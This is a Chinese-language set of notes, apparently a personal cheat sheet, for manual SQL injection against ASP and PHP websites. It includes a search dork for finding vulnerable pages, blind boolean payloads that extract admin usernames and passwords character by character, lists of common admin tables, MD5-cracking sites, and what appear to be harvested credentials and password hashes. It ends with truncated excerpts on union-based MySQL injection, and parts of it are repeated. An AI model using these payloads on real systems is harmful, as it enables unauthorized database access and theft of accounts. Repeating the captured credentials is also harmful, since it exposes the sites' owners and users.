先找注入點
inurl:asp?id=9
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜長度 and (select top 1 len(username) from admin)>5
username長 4
password長 16
猜內容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc碼
username 120,117
__________________
www.md5.com.cn
www.xmd5.com
www.cmd5.com
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜長度 and (select top 1 len(username) from admin)>5
username長 4
password長 16
猜內容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc碼
username 120,117
常見表段
sysadmin admin administrator manger
[username] : hsqs1
[password] : 1f60163129f50b84 yingkesong1
______________
猜表名 and (select count(*) from sysadmin)>0
猜列名 and (select count(username) from sysadmin)>0
猜長度 and (select top 1 len(username) from sysadmin)>5
猜內容 and (select top 1 asc(mid(username,1,1)) from admin)>50
asc碼
username 120,117
admin
username 5
password 16
104 115
sql注入 手工注入
表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...
手工注入 MySQL手工注入實戰和分析
通過 和構造 and 1 1 和 and 1 2 檢視頁面是否報錯。這裡通過and 1 1 發現頁面正常。如下圖。接下來,咱們再構造 and 1 2 發現頁面報錯,說明頁面存在注入點。如下圖。通過 order by 語句,如果後面輸入的數字大於資料庫的字段數,頁面就會報錯,通過這個,咱們先輸入 or...
PHP手工注入
後台 查詢版本 資料庫名 查詢表 ytw 轉換成16等於 0x797477 查詢列 查詢賬號密碼 0x5c 代表不用去換算16進製制,如果不填就去轉換下 wwwrree da1864898daff10a7a936233d013cbb1,admin fb56fe7ffc84a325b7e4889174...